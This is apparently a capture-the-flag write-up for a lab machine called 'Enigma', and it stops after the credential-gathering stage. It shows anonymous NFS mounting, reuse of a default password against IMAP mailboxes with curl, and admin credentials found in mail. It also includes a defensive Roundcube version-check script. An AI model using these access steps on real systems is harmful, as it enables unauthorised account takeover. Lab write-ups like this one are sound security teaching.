Hack The Box - HTB Enigma Writeup - Easy - Weekly - June 27th, 2026

Placeholders used

Token         Meaning
$TARGET       the target machine's IP
$ATTACKER     your VPN (tun0) IP
$LPORT        your reverse-shell listener port (e.g. 9001)
[REDACTED]    value intentionally removed

0. Setup & a network gotcha

Add the vhosts (discovered along the way: enigma.htb, mail001.enigma.htb,
support_001.enigma.htb):

echo "$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb" | sudo tee -a /etc/hosts

TLS connections to the box (IMAPS, HTTPS) hung while plain TCP connected.
This is the classic HTB tun0 MTU black-hole: large packets (TLS ClientHello
+ certificate) get dropped on the VPN. Fix by lowering the interface MTU:

sudo ip link set dev tun0 mtu 1300

After this, everything worked. If IMAP/HTTPS to a box hangs while plain TCP
connects, suspect MTU first.


1. Enumeration

nmap -p- --min-rate 2000 -sV -sC $TARGET

A mail-server-themed host:

22/tcp    ssh        (publickey only)
80/tcp    http       nginx (Ubuntu)
110/tcp   pop3
111/tcp   rpcbind
143/tcp   imap
993/tcp   imaps
995/tcp   pop3s
2049/tcp  nfs
+ high ports → mountd / nlockmgr / status (NFS machinery)

Reading the surface: a full mail stack (POP3/IMAP + TLS), NFS/rpcbind
(always worth an anonymous check), and a web server. No SMTP exposed — mail is
delivered locally only.


2. NFS → onboarding credentials

showmount -e $TARGET
# Export list for $TARGET:
# /srv/nfs/onboarding *

The * means any client address may mount the export; NFSv3 with the default
AUTH_SYS flavour trusts the client's claimed uid, so an anonymous mount is
enough to read it:

sudo mkdir -p /mnt/onboarding
sudo mount -t nfs -o vers=3,nolock $TARGET:/srv/nfs/onboarding /mnt/onboarding
ls -la /mnt/onboarding
# -rw-r--r-- 1 root root 1751 ... New_Employee_Access.pdf

The PDF is an IT "New Employee System Access" sheet:

Employee : Kevin Mitchell
Webmail  : http://mail001.enigma.htb
Username : kevin
Password : Enigma2024!

3. Webmail + password reuse → OpenSTAManager creds

The webmail (mail001.enigma.htb) is Roundcube 1.6.16. The version is leaked
in the login page's inline JS (rcversion: 10616 = version2int("1.6.16")).
1.6.16 is the patched release — it fixes the whole 2026 Roundcube CVE batch —
so chasing a Roundcube RCE is a deliberate dead end. The credentials are
real, though, and the onboarding password is a corporate default that is
reused.
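The rcversion fingerprint above is also a quick way to confirm that a Roundcube deployment you operate is at or above the release the writeup treats as patched. The following is an added example, not code from the writeup or from Roundcube: it parses the leaked rcversion out of a constructed login-page snippet, unpacks it with the mapping the writeup describes (1.6.16 -> 10616, i.e. major*10000 + minor*100 + patch, which is an assumption about Roundcube's own routine), and compares it with a baseline.

```python
import re

# Constructed sample of a Roundcube login page's inline JS (not captured from
# the box); the real page embeds rcversion inside an rcmail.set_env({...}) call.
SAMPLE_LOGIN_HTML = (
    '<script type="text/javascript">\n'
    'var rcmail = new rcube_webmail();\n'
    'rcmail.set_env({"task":"login","rcversion":10616,"skin":"elastic"});\n'
    '</script>'
)


def version2int(version: str) -> int:
    """Pack 'major.minor.patch' as major*10000 + minor*100 + patch.
    This is the mapping the writeup describes (1.6.16 -> 10616); it is an
    assumption about Roundcube's own routine, not verified against source."""
    parts = [int(p) for p in version.split(".")]
    parts += [0] * (3 - len(parts))          # "1.6" -> 1.6.0
    major, minor, patch = parts[:3]
    if not (0 <= minor < 100 and 0 <= patch < 100):
        raise ValueError(f"component out of range: {version}")
    return major * 10000 + minor * 100 + patch


def int2version(n: int) -> str:
    """Inverse of version2int: 10616 -> '1.6.16'."""
    return f"{n // 10000}.{(n // 100) % 100}.{n % 100}"


_RCVERSION = re.compile(r'"rcversion"\s*:\s*(\d+)')


def extract_rcversion(html: str):
    """Return the integer rcversion leaked in the page, or None if absent."""
    m = _RCVERSION.search(html)
    return int(m.group(1)) if m else None


def check_patch_level(html: str, baseline: str = "1.6.16"):
    """Return (leaked_version, at_or_above_baseline) for a login page body."""
    leaked = extract_rcversion(html)
    if leaked is None:
        return None, False
    return int2version(leaked), leaked >= version2int(baseline)


if __name__ == "__main__":
    print(check_patch_level(SAMPLE_LOGIN_HTML))   # ('1.6.16', True)
```

Because the version is exposed unauthenticated on the login page, the same check also tells you what an outsider can read; hiding it requires a Roundcube-side change, not a web-server rewrite.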

Drive IMAP directly with curl (no web UI needed). First log in as kevin and
list his folders:

curl -s --url "imaps://$TARGET/" --user "kevin:Enigma2024!" -k
# * LIST (...) "/" Sent / Trash / INBOX

Where sarah comes from: read kevin's inbox. His only message is a welcome
email from sarah@enigma.htb ("I'm Sarah from the Accounts department…"),
which is how we learn a second user/mailbox exists:

curl -s --url "imaps://$TARGET/INBOX/;MAILINDEX=1" --user "kevin:Enigma2024!" -k
From    : sarah@enigma.htb
Subject : Welcome to Enigma Corp, Kevin!
...
I'm Sarah from the Accounts department. I'll be your point of contact ...

Now test the reused onboarding password against sarah's mailbox — it works:

curl -s --url "imaps://$TARGET/" --user "sarah:Enigma2024!" -k
# * LIST (...) "/" Trash / INBOX        ← auth succeeds → password reuse confirmed

Read sarah's inbox:

curl -s --url "imaps://$TARGET/INBOX/;MAILINDEX=1" --user "sarah:Enigma2024!" -k
Subject : Re: OpenSTAManager Access Request
URL      : http://support_001.enigma.htb
Username : admin
Password : Ne3s4rtars78s

A third vhost and admin credentials for OpenSTAManager (an open-source
management / e-invoicing app). SSH is publickey-only, so reuse helps only on the
mail service.